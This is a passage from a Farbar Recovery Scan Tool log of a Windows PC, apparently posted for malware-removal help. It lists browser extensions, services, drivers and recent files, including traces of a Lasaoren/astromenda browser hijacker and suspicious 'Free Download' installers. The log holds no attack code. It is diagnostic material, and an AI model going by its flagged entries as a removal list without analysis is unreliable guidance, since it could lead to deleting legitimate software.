FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Users\Ryan\AppData\Roaming\mozilla\plugins\npatgpc.dll (Cisco WebEx LLC)
FF SearchPlugin: C:\Users\Ryan\AppData\Roaming\Mozilla\Firefox\Profiles\vbjovzpg.default\searchplugins\bingp.xml
FF SearchPlugin: C:\Users\Ryan\AppData\Roaming\Mozilla\Firefox\Profiles\vbjovzpg.default\searchplugins\Lasaoren.xml
FF SearchPlugin: C:\Users\Ryan\AppData\Roaming\Mozilla\Firefox\Profiles\vbjovzpg.default\searchplugins\safesearch.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\ddg.xml
FF Extension: LastPass - C:\Users\Ryan\AppData\Roaming\Mozilla\Firefox\Profiles\vbjovzpg.default\Extensions\support@lastpass.com [2014-08-18]
FF Extension: Evernote Web Clipper - C:\Users\Ryan\AppData\Roaming\Mozilla\Firefox\Profiles\vbjovzpg.default\Extensions\{E0B8C461-F8FB-49b4-8373-FE32E9252800} [2014-01-10]
FF Extension: Firebug - C:\Users\Ryan\AppData\Roaming\Mozilla\Firefox\Profiles\vbjovzpg.default\Extensions\firebug@software.joehewitt.com.xpi [2012-12-05]
FF Extension: Awesome screenshot: Capture and Annotate - C:\Users\Ryan\AppData\Roaming\Mozilla\Firefox\Profiles\vbjovzpg.default\Extensions\jid0-GXjLLfbCoAx0LcltEdFrEkQdQPI@jetpack.xpi [2013-07-30]
FF Extension: Yesware Email Tracking - C:\Users\Ryan\AppData\Roaming\Mozilla\Firefox\Profiles\vbjovzpg.default\Extensions\jid1-T5mdAATMX3urKA@jetpack.xpi [2013-05-20]
FF Extension: YSlow - C:\Users\Ryan\AppData\Roaming\Mozilla\Firefox\Profiles\vbjovzpg.default\Extensions\yslow@yahoo-inc.com.xpi [2012-12-05]
FF Extension: Lasaoren - C:\Users\Ryan\AppData\Roaming\Mozilla\Firefox\Profiles\vbjovzpg.default\Extensions\{0760faf4-8d0b-49d1-bbac-d05eb1ac32c7}.xpi [2014-11-12]
FF Extension: No Name - C:\Program Files (x86)\Mozilla Firefox\browser\extensions\{82AF8DCA-6DE9-405D-BD5E-43525BDAD38A}.xpi [2014-11-10]
FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.2.0.38\coFFPlgn
FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.2.0.38\coFFPlgn [2014-11-12]
FF Extension: No Name - {2D3F3651-74B9-4795-BDEC-6DA2F431CB62} [Not Found]

Chrome:
=======
CHR HomePage: Default -> hxxp://Lasaoren.com/?f=1&a=lrn_dnldstr_14_46_ff&cd=2XzuyEtN2Y1L1Qzu0EtD0C0ByE0EyB0D0CzyyDzytBtCtBtDtN0D0Tzu0StCtDyEyBtN1L2XzutAtFyCtFtCtFtDtN1L1CzutCyEtBzytDyD1V1TtN1L1G1B1V1N2Y1L1Qzu2SyC0C0BtAyD0FzyyEtGzztB0EtBtGzzyEzztCtGyByCtCyEtGtCtAtCzzzyyBtCtB0B0B0FtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2StCyBzz0ByC0ByD0AtG0DtD0E0CtGyEtD0A0EtGzyyByEzztG0EyD0FtA0D0DtA0FtDzzzyyE2Q&cr=90030310&ir=
CHR StartupUrls: Default -> "hxxp://Lasaoren.com/?f=7&a=lrn_dnldstr_14_46_ff&cd=2XzuyEtN2Y1L1Qzu0EtD0C0ByE0EyB0D0CzyyDzytBtCtBtDtN0D0Tzu0StCtDyEyBtN1L2XzutAtFyCtFtCtFtDtN1L1CzutCyEtBzytDyD1V1TtN1L1G1B1V1N2Y1L1Qzu2SyC0C0BtAyD0FzyyEtGzztB0EtBtGzzyEzztCtGyByCtCyEtGtCtAtCzzzyyBtCtB0B0B0FtD2QtN1M1F1B2Z1V1N2Y1L1Qzu2StCyBzz0ByC0ByD0AtG0DtD0E0CtGyEtD0A0EtGzyyByEzztG0EyD0FtA0D0DtA0FtDzzzyyE2Q&cr=90030310&ir=","hxxp://astromenda.com/?f=7&a=ast_frg01_14_49_ff&cd=2XzuyEtN2Y1L1Qzu0EtD0C0ByE0EyB0D0CzyyDzytBtCtBtDtN0D0Tzu0SzyyDtDtN1L2XzutAtFtDtFtCtDtFtBtN1L1CzutCyEtBzytDyD1V1StN1L1G1B1V1N2Y1L1Qzu2SyEtD0DtBtByEzz0AtGtA0Ezy0DtGtA0EzytBtG0CtA0AtBtGtD0CtAyCtA0C0EtCyE0E0F0E2QtN1M1F1B2Z1V1N2Y1L1Qzu2StByEyEtAyB0CtB0AtGtBzy0FtDtGyEyE0E0EtGzytAtByCtG0DzzyC0CzzzztByBtD0CyByB2Q&cr=1230190011&ir="
CHR DefaultSearchKeyword: Default -> Lasaoren.com
CHR DefaultSearchURL: Default -> http://Lasaoren.com/...cr=90030310&ir=
CHR DefaultSuggestURL: Default -> {google:baseSuggestURL}search?client=chrome&hl={language}&q={searchTerms}
CHR Profile: C:\Users\Ryan\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Drive) - C:\Users\Ryan\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2012-11-14]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Ryan\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-08-06]
CHR Extension: (YouTube) - C:\Users\Ryan\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2012-11-14]
CHR Extension: (Google Search) - C:\Users\Ryan\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2012-11-14]
CHR Extension: (LastPass: Free Password Manager) - C:\Users\Ryan\AppData\Local\Google\Chrome\User Data\Default\Extensions\hdokiejnpimakedhajhdlcegeplioahd [2012-11-17]
CHR Extension: (Norton Identity Safe) - C:\Users\Ryan\AppData\Local\Google\Chrome\User Data\Default\Extensions\iikflkcanblccfahdhdonehdalibjnif [2014-08-14]
CHR Extension: (Norton Security Toolbar) - C:\Users\Ryan\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk [2012-11-14]
CHR Extension: (Google Wallet) - C:\Users\Ryan\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-23]
CHR Extension: (Gmail) - C:\Users\Ryan\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2012-11-14]
CHR HKLM\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\Exts\Chrome.crx [2014-10-01]
CHR HKLM-x32\...\Chrome\Extension: [hdokiejnpimakedhajhdlcegeplioahd] - C:\Program Files (x86)\LastPass\lpchrome.crx [2012-11-14]
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2014-07-14]
CHR HKLM-x32\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\Exts\Chrome.crx [2014-10-01]

==================== Services (Whitelisted) =================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1390176 2014-07-14] (Microsoft Corporation)
R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1767520 2014-07-14] (Microsoft Corporation)
R2 HP Support Assistant Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [92160 2013-11-04] (Hewlett-Packard Company) [File not signed]
R2 LightScribeService; c:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [73728 2009-08-20] (Hewlett-Packard Company) [File not signed]
R2 N360; C:\Program Files (x86)\Norton 360 Premier Edition\Engine\21.6.0.32\N360.exe [265040 2014-09-21] (Symantec Corporation)
R2 pcCMService; C:\Program Files (x86)\Common Files\Motive\pcCMService.exe [361472 2012-06-18] (Alcatel-Lucent) [File not signed]
R2 pcCMService64; C:\Program Files\Common Files\Motive\pcCMService.exe [441344 2012-06-18] (Alcatel-Lucent) [File not signed]
R2 pcServiceHost; C:\Program Files (x86)\Common Files\Motive\pcServiceHost.exe [342016 2012-06-14] (Alcatel-Lucent) [File not signed]
R2 QBCFMonitorService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe [45056 2013-02-01] (Intuit) [File not signed]
S3 QBFCService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe [61440 2009-07-23] (Intuit Inc.) [File not signed]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

R1 BHDrvx64; C:\Program Files (x86)\Norton 360 Premier Edition\NortonData\21.2.0.38\Definitions\BASHDefs\20141107.001\BHDrvx64.sys [1587416 2014-10-03] (Symantec Corporation)
R1 ccSet_N360; C:\Windows\system32\drivers\N360x64\1506000.020\ccSetx64.sys [162392 2014-02-24] (Symantec Corporation)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [487216 2014-10-06] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [142640 2014-09-18] (Symantec Corporation)
R1 IDSVia64; C:\Program Files (x86)\Norton 360 Premier Edition\NortonData\21.2.0.38\Definitions\IPSDefs\20141111.001\IDSvia64.sys [633560 2014-08-27] (Symantec Corporation)
R3 L6TPortB; C:\Windows\System32\Drivers\L6TPortB64.sys [894336 2010-03-09] (Line 6)
R0 MBAMSwissArmy; C:\Windows\System32\drivers\MBAMSwissArmy.sys [131800 2014-11-12] (Malwarebytes Corporation)
S3 MREMP50; C:\Program Files (x86)\Common Files\Motive\MREMP50.sys [21248 2012-06-14] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
S3 MREMP50a64; C:\Program Files\Common Files\Motive\MREMP50a64.SYS [43008 2012-06-14] (Printing Communications Assoc., Inc. (PCAUSA))
S3 MRESP50; C:\Program Files (x86)\Common Files\Motive\MRESP50.sys [20096 2012-06-14] (Printing Communications Assoc., Inc. (PCAUSA)) [File not signed]
R3 MRESP50a64; C:\Program Files\Common Files\Motive\MRESP50a64.SYS [40960 2012-06-14] (Printing Communications Assoc., Inc. (PCAUSA))
R3 NAVENG; C:\Program Files (x86)\Norton 360 Premier Edition\NortonData\21.2.0.38\Definitions\VirusDefs\20141111.034\ENG64.SYS [129752 2014-10-06] (Symantec Corporation)
R3 NAVEX15; C:\Program Files (x86)\Norton 360 Premier Edition\NortonData\21.2.0.38\Definitions\VirusDefs\20141111.034\EX64.SYS [2137304 2014-10-06] (Symantec Corporation)
R1 SRTSP; C:\Windows\System32\Drivers\N360x64\1506000.020\SRTSP64.SYS [876248 2014-08-25] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\N360x64\1506000.020\SRTSPX64.SYS [37592 2014-08-25] (Symantec Corporation)
R0 SymDS; C:\Windows\System32\drivers\N360x64\1506000.020\SYMDS64.SYS [493656 2013-10-29] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\drivers\N360x64\1506000.020\SYMEFA64.SYS [1148120 2014-03-03] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [177752 2014-04-05] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\N360x64\1506000.020\Ironx64.SYS [266968 2014-08-06] (Symantec Corporation)
R1 SymNetS; C:\Windows\System32\Drivers\N360x64\1506000.020\SYMNETS.SYS [593112 2014-02-17] (Symantec Corporation)
S3 MREMPR5; \??\C:\PROGRA~1\COMMON~1\Motive\MREMPR5.SYS [X]
S3 MRENDIS5; \??\C:\PROGRA~1\COMMON~1\Motive\MRENDIS5.SYS [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-11-12 15:45 - 2014-11-12 15:45 - 00042051 _____ () C:\Users\Ryan\Downloads\Addition.txt
2014-11-12 15:43 - 2014-11-12 16:22 - 00034003 _____ () C:\Users\Ryan\Downloads\FRST.txt
2014-11-12 15:43 - 2014-11-12 16:21 - 00000000 ____D () C:\FRST
2014-11-12 15:43 - 2014-11-12 15:43 - 02116096 _____ (Farbar) C:\Users\Ryan\Downloads\FRST64.exe
2014-11-12 13:17 - 2014-11-12 13:17 - 00000044 _____ () C:\Users\Ryan\AppData\Roaming\WB.CFG
2014-11-12 12:22 - 2014-11-12 12:22 - 00001164 _____ () C:\Users\Ryan\Desktop\Continue Free Download Installation.lnk
2014-11-12 12:16 - 2014-11-12 12:17 - 00000000 ____D () C:\Users\Ryan\AppData\Roaming\WSE_Lasaoren
2014-11-12 12:16 - 2014-11-12 12:16 - 24489269 _____ () C:\Users\Ryan\Downloads\setup_free.exe
2014-11-12 12:16 - 2014-11-12 12:16 - 00000000 ____D () C:\ProgramData\BoostSoftware
2014-11-12 12:13 - 2014-11-12 12:13 - 00796616 _____ ( ) C:\Users\Ryan\Downloads\Free_Download_Setup(1).exe
2014-11-12 12:12 - 2014-11-12 12:12 - 00796616 _____ ( ) C:\Users\Ryan\Downloads\Free_Download_Setup.exe
2014-11-12 11:25 - 2014-11-12 12:06 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-11-12 11:21 - 2014-11-12 11:21 - 14439144 _____ (Malwarebytes Corp.) C:\Users\Ryan\Downloads\mbar-1.08.0.1001(1).exe
2014-11-12 11:16 - 2014-11-12 11:17 - 00000000 ____D () C:\Users\Ryan\Desktop\CB Logos
2014-11-12 11:11 - 2014-11-12 11:17 - 00000000 ____D () C:\Users\Ryan\Desktop\New folder
2014-11-12 11:05 - 2014-11-12 11:09 - 00000000 ____D () C:\Users\Ryan\Desktop\mysearchlinkspics
2014-11-12 11:01 - 2014-11-12 12:06 - 00000000 ____D () C:\Users\Ryan\Desktop\mbar
2014-11-12 11:00 - 2014-11-12 11:00 - 14439144 _____ (Malwarebytes Corp.) C:\Users\Ryan\Downloads\mbar-1.08.0.1001.exe
2014-11-12 09:18 - 2014-11-12 09:18 - 04909382 _____ () C:\Users\Ryan\Downloads\mbam-chameleon-3.1.7.0(1).zip
2014-11-12 02:14 - 2014-11-12 11:25 - 00131800 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-11-12 02:13 - 2014-11-12 11:23 - 00096472 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-11-12 02:13 - 2014-11-12 02:13 - 00001108 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-11-12 02:13 - 2014-11-12 02:13 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-11-12 02:13 - 2014-11-12 02:13 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-11-12 02:13 - 2014-11-12 02:13 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-11-12 02:13 - 2014-10-01 11:11 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-11-12 02:13 - 2014-10-01 11:11 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-11-12 02:12 - 2014-11-12 02:12 - 19828376 _____ (Malwarebytes Corporation ) C:\Users\Ryan\Downloads\mbam-setup-2.0.3.1025.exe
2014-11-12 02:09 - 2014-11-12 02:09 - 04909382 _____ () C:\Users\Ryan\Downloads\mbam-chameleon-3.1.7.0.zip
2014-11-11 16:34 - 2014-11-11 16:34 - 00001624 _____ () C:\Users\Ryan\Desktop\Shortcut to scrapebox.exe.lnk
2014-11-11 16:31 - 2014-11-11 16:31 - 00425984 _____ (The OpenSSL Project, http://www.openssl.org/) C:\Users\Ryan\Downloads\libeay32.dll
2014-11-11 16:31 - 2014-11-11 16:31 - 00232960 _____ (GnuWin32 <http://gnuwin32.sourceforge.net>) C:\Users\Ryan\Downloads\libssl32.dll
2014-11-11 16:31 - 2014-11-11 16:31 - 00200704 _____ (The OpenSSL Project, http://www.openssl.org/) C:\Users\Ryan\Downloads\ssleay32.dll
2014-11-10 08:12 - 2014-11-10 08:12 - 00000000 ____D () C:\Program Files (x86)\Mozilla Firefox
2014-11-08 22:23 - 2014-11-08 22:24 - 01701816 _____ () C:\Windows\Minidump\110814-61589-01.dmp
2014-11-07 14:22 - 2014-11-11 16:49 - 00000000 ____D () C:\Users\Ryan\Downloads\Plugins
2014-11-07 14:22 - 2014-11-11 16:49 - 00000000 ____D () C:\Users\Ryan\Downloads\Addons
2014-11-07 14:22 - 2014-11-11 16:31 - 00000000 ____D () C:\Users\Ryan\Downloads\Configuration
2014-11-07 14:22 - 2014-09-02 01:42 - 04072384 _____ (Softtouch Software Design) C:\Users\Ryan\Downloads\scrapebox.exe
2014-11-07 14:22 - 2012-02-17 17:58 - 00000000 ____D () C:\Users\Ryan\Downloads\Blacklist
2014-11-07 14:22 - 2012-02-02 20:43 - 00000000 ____D () C:\Users\Ryan\Downloads\RSS Submission
2014-11-07 14:22 - 2011-05-05 18:42 - 00000000 ____D () C:\Users\Ryan\Downloads\Comment Poster
2014-11-07 14:22 - 2011-04-13 01:21 - 00482760 _____ (Softtouch Software Design) C:\Users\Ryan\Downloads\sbupdate.exe
2014-11-07 14:22 - 2009-12-16 15:36 - 00000000 ____D () C:\Users\Ryan\Downloads\Projects
2014-11-07 14:22 - 2009-11-16 06:54 - 00000000 ____D () C:\Users\Ryan\Downloads\Trackbacks
2014-11-07 14:22 - 2009-11-16 06:54 - 00000000 ____D () C:\Users\Ryan\Downloads\Proxies
2014-11-07 14:22 - 2009-11-16 06:54 - 00000000 ____D () C:\Users\Ryan\Downloads\Ping Mode
2014-11-07 14:21 - 2014-11-07 14:21 - 05230370 _____ () C:\Users\Ryan\Downloads\scrapebox.zip
2014-11-07 14:21 - 2014-11-07 14:21 - 00000000 ____D () C:\Users\Ryan\Downloads\scrapebox
2014-11-07 07:52 - 2014-11-07 07:52 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud
2014-11-04 14:03 - 2014-11-04 14:03 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2014-11-03 19:16 - 2014-11-03 19:16 - 00091068 _____ () C:\Users\Ryan\Documents\6 month top 250 stock gainers.xlsx
2014-11-03 19:09 - 2014-11-03 19:10 - 00091654 _____ () C:\Users\Ryan\Documents\3 month percent average top 250.xlsx
2014-11-03 13:04 - 2014-11-03 13:04 - 00001847 _____ () C:\Users\Public\Desktop\QuickTime Player.lnk
2014-11-03 13:04 - 2014-11-03 13:04 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2014-11-03 13:04 - 2014-11-03 13:04 - 00000000 ____D () C:\Program Files (x86)\QuickTime
2014-11-03 13:02 - 2014-11-03 13:02 - 00001785 _____ () C:\Users\Public\Desktop\iTunes.lnk
2014-11-03 13:02 - 2014-11-03 13:02 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-11-03 12:59 - 2014-11-03 13:00 - 00000000 ____D () C:\ProgramData\E1864A66-75E3-486a-BD95-D1B7D99A84A7
2014-11-03 12:59 - 2014-11-03 13:00 - 00000000 ____D () C:\Program Files\iTunes
2014-11-03 12:59 - 2014-11-03 13:00 - 00000000 ____D () C:\Program Files (x86)\iTunes
2014-11-03 12:59 - 2014-11-03 12:59 - 00000000 ____D () C:\Program Files\iPod
2014-11-03 12:13 - 2014-11-03 12:13 - 00001034 _____ () C:\Users\Ryan\Desktop\Apple Mobile Device USB Driver - Shortcut.lnk
2014-11-03 12:09 - 2014-11-03 12:09 - 00000000 ____D () C:\Windows\en
2014-11-03 12:08 - 2014-11-03 12:08 - 00001307 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Movie Maker.lnk
2014-11-03 12:07 - 2014-11-03 12:07 - 00002488 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Live Messenger.lnk
2014-11-03 12:04 - 2014-11-03 12:04 - 00002178 _____ () C:\Users\Ryan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft OneDrive.lnk
2014-11-03 09:46 - 2014-11-03 09:47 - 72331056 _____ (Apple Inc.) C:\Users\Ryan\Downloads\iCloudSetup.exe
2014-10-31 13:34 - 2014-10-31 13:36 - 122418480 _____ (Apple Inc.) C:\Users\Ryan\Downloads\iTunes64Setup.exe
2014-10-14 22:52 - 2014-09-28 16:58 - 03198976 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-10-14 22:52 - 2014-08-18 19:11 - 00693176 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2014-10-14 22:52 - 2014-08-18 19:10 - 00616352 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2014-10-14 22:52 - 2014-08-18 19:08 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2014-10-14 22:52 - 2014-08-18 19:08 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2014-10-14 22:52 - 2014-08-18 19:08 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2014-10-14 22:52 - 2014-08-18 19:07 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2014-10-14 22:52 - 2014-08-18 19:07 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2014-10-14 22:52 - 2014-08-18 19:07 - 00058880 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2014-10-14 22:52 - 2014-08-18 19:07 - 00032256 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2014-10-14 22:52 - 2014-08-18 19:07 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2014-10-14 22:52 - 2014-08-18 18:41 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2014-10-14 22:52 - 2014-08-18 18:41 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2014-10-14 22:52 - 2014-08-18 18:06 - 00061440 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2014-10-14 22:52 - 2014-07-06 18:07 - 14632960 _____ (Microsoft Corporation) C:\Windows\system32\wmp.dll
2014-10-14 22:52 - 2014-07-06 18:07 - 00782848 _____ (Microsoft Corporation) C:\Windows\system32\wmdrmsdk.dll
2014-10-14 22:52 - 2014-07-06 18:07 - 00229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-10-14 22:52 - 2014-07-06 18:06 - 05551032 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2014-10-14 22:52 - 2014-07-06 18:06 - 04120576 _____ (Microsoft Corporation) C:\Windows\system32\mf.dll
2014-10-14 22:52 - 2014-07-06 18:06 - 01574400 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-10-14 22:52 - 2014-07-06 18:06 - 01480192 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-10-14 22:52 - 2014-07-06 18:06 - 01202176 _____ (Microsoft Corporation) C:\Windows\system32\drmv2clt.dll
2014-10-14 22:52 - 2014-07-06 18:06 - 01069056 _____ (Microsoft Corporation) C:\Windows\system32\cryptui.dll
2014-10-14 22:52 - 2014-07-06 18:06 - 00842240 _____ (Microsoft Corporation) C:\Windows\system32\blackbox.dll
2014-10-14 22:52 - 2014-07-06 18:06 - 00679424 _____ (Microsoft Corporation) C:\Windows\system32\audiosrv.dll
2014-10-14 22:52 - 2014-07-06 18:06 - 00641024 _____ (Microsoft Corporation) C:\Windows\system32\msscp.dll
2014-10-14 22:52 - 2014-07-06 18:06 - 00631808 _____ (Microsoft Corporation) C:\Windows\system32\evr.dll
2014-10-14 22:52 - 2014-07-06 18:06 - 00500224 _____ (Microsoft Corporation) C:\Windows\system32\AUDIOKSE.dll
2014-10-14 22:52 - 2014-07-06 18:06 - 00497664 _____ (Microsoft Corporation) C:\Windows\system32\drmmgrtn.dll
2014-10-14 22:52 - 2014-07-06 18:06 - 00440832 _____ (Microsoft Corporation) C:\Windows\system32\AudioEng.dll
2014-10-14 22:52 - 2014-07-06 18:06 - 00432128 _____ (Microsoft Corporation) C:\Windows\system32\mfplat.dll
2014-10-14 22:52 - 2014-07-06 18:06 - 00325632 _____ (Microsoft Corporation) C:\Windows\system32\msnetobj.dll
2014-10-14 22:52 - 2014-07-06 18:06 - 00296448 _____ (Microsoft Corporation) C:\Windows\system32\AudioSes.dll
2014-10-14 22:52 - 2014-07-06 18:06 - 00284672 _____ (Microsoft Corporation) C:\Windows\system32\EncDump.dll
2014-10-14 22:52 - 2014-07-06 18:06 - 00206848 _____ (Microsoft Corporation) C:\Windows\system32\mfps.dll
2014-10-14 22:52 - 2014-07-06 18:06 - 00188416 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2014-10-14 22:52 - 2014-07-06 18:06 - 00187904 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-10-14 22:52 - 2014-07-06 18:06 - 00082432 _____ (Microsoft Corporation) C:\Windows\system32\cryptsp.dll
2014-10-14 22:52 - 2014-07-06 18:06 - 00055808 _____ (Microsoft Corporation) C:\Windows\system32\rrinstaller.exe
2014-10-14 22:52 - 2014-07-06 18:06 - 00024576 _____ (Microsoft Corporation) C:\Windows\system32\mfpmp.exe
2014-10-14 22:52 - 2014-07-06 18:06 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\spwmp.dll
2014-10-14 22:52 - 2014-07-06 18:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\msdxm.ocx
2014-10-14 22:52 - 2014-07-06 18:06 - 00005120 _____ (Microsoft Corporation) C:\Windows\system32\dxmasf.dll
2014-10-14 22:52 - 2014-07-06 18:05 - 12625920 _____ (Microsoft Corporation) C:\Windows\system32\wmploc.DLL
2014-10-14 22:52 - 2014-07-06 18:05 - 00126464 _____ (Microsoft Corporation) C:\Windows\system32\audiodg.exe
2014-10-14 22:52 - 2014-07-06 18:02 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\mferror.dll
2014-10-14 22:52 - 2014-07-06 17:52 - 00663552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\PEAuth.sys
2014-10-14 22:52 - 2014-07-06 17:40 - 11411456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmp.dll
2014-10-14 22:52 - 2014-07-06 17:40 - 03208704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mf.dll
2014-10-14 22:52 - 2014-07-06 17:40 - 01329664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2014-10-14 22:52 - 2014-07-06 17:40 - 01174528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2014-10-14 22:52 - 2014-07-06 17:40 - 01005056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptui.dll
2014-10-14 22:52 - 2014-07-06 17:40 - 00988160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmv2clt.dll
2014-10-14 22:52 - 2014-07-06 17:40 - 00744960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\blackbox.dll
2014-10-14 22:52 - 2014-07-06 17:40 - 00617984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wmdrmsdk.dll
2014-10-14 22:52 - 2014-07-06 17:40 - 00504320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msscp.dll
2014-10-14 22:52 - 2014-07-06 17:40 - 00489984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\evr.dll
2014-10-14 22:52 - 2014-07-06 17:40 - 00442880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AUDIOKSE.dll
2014-10-14 22:52 - 2014-07-06 17:40 - 00406016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\drmmgrtn.dll
2014-10-14 22:52 - 2014-07-06 17:40 - 00374784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AudioEng.dll
2014-10-14 22:52 - 2014-07-06 17:40 - 00354816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfplat.dll
2014-10-14 22:52 - 2014-07-06 17:40 - 00265216 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msnetobj.dll
